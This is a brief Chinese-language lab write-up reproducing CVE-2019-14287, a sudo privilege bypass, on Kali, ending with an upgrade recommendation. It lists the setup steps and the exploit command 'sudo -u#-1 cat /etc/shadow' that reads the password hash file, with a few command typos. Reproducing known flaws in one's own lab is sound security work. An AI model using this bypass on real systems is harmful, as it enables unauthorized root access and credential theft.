CVE-2019-14287:sudo权限绕过漏洞
实验环境
Kali
影响范围
sudo 1.8.28之前的所有版本
复现过程
首先看一下自身Kali的sudo版本,命令:sudo -V
符合条件,接下来需要新建一个test用户,命令:useradd test passwd test
然后vi进入sudoers,命令:vi /etc/sudoers
在root ALL=(ALL:ALL) ALL下添加test用户的配置:test ALL=(ALL.!root) ALL
然后:!wq强制保存退出
test 指的是test用户
第一个ALL表示用户可以在任何地方使用sudo
第二个(ALL,!root)表示命令可以被除了root以外的任何用户执行
最后一个ALL表示被允许执行
接着用test用户登录,命令:su test尝试一下是否读取shadow文件,命令:cat /etc/shadow
系统提示权限不够
然后使用命令:sudo -u#-1 cat/etc/shadow
读取成功。
修复建议
更新sudo版本至1.8.28以上